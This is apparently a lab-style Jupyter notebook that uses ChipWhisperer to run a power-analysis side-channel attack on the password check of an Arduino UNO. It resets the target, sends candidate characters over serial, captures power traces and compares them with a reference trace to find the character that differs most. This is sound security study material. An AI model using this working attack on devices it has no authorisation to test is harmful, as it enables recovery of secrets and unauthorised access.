# Code for the power analysis attack against an Arduino UNO (target extern)

In [4]:
import chipwhisperer as cw
import time
import matplotlib.pyplot as plt
import numpy as np

### Setup scope and target

In [5]:
scope = cw.scope()
scope.default_setup()
target = cw.target(scope, cw.targets.SimpleSerial2)
target.baud = 9600   # match your Arduino sketch

scope.adc.samples = 5000

### Reset of the target

In [ ]:
#time.sleep(5)
#print('start')

# reset de la target
scope.io.nrst = 'low'
time.sleep(0.1)
scope.io.nrst = 'high'

# attendre que la cible redémarre
time.sleep(0.1)
#print('finish')

### Send of a password prompt

In [7]:
password_try = b"\x01\n"
# Use the raw serial object, not SimpleSerial parsing
print("Boot message:", target.ser.read(50))   # read up to 50 bytes
 
# Send a password
target.ser.write(password_try)
print("Response:", target.ser.read(50))

Boot message: 
Response: >> ACCESS DENIED

Enter password:



### Function to send charachters and capture a trace

In [ ]:
def pass_trace(pass_guess):

    scope.arm()
    target.ser.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    return trace

### List of charachters who can be in the password

In [1]:
ascii_chars = [chr(i) for i in range(33, 127)]

#'charchter who are not in the password (can be used for the ref trace)'
#non_asci = [chr(k) for k in range(1, 33)]
#test_chara = 'abcdef7'#ghij'

#print(non_asci)
#print(ascii_chars)

### Plot of traces for every possible character

In [ ]:
plot = cw.plot({})
for c in ascii_chars: 
    trace = pass_trace(c + "\n")[0:500]
    plot *= cw.plot(trace) # - ref_trace)
plot


### Plot of traces - a ref trace

In [ ]:
ref_trace = pass_trace("\x01\n")[0:500]
plot = cw.plot({})
for c in ascii_chars: 
    trace = pass_trace(c + "\n")[0:500]
    plot *= cw.plot(trace - ref_trace)
plot

### Calcul of the character that differ the most

In [ ]:
#x = 100
#i = 1

ref_trace = pass_trace("a\n")[125:130]#[100 + x*i : 200 + x*i]
prec_diff = 0

for c in ascii_chars: 
    target.ser.read(50)
    trace = pass_trace(c + "\n")[125:130] #[100 + x*i : 200 + x*i]
    diff = np.sum(np.abs(trace - ref_trace))
    
    
    if diff > prec_diff :
        print("{:1} diff = {:2}".format(c, diff))
        prec_diff = diff

    time.sleep(0.1)    #3 est une valeur qui fonctionne bien mais c'est lent
    #i = i + 1

In [8]:
scope.dis()

True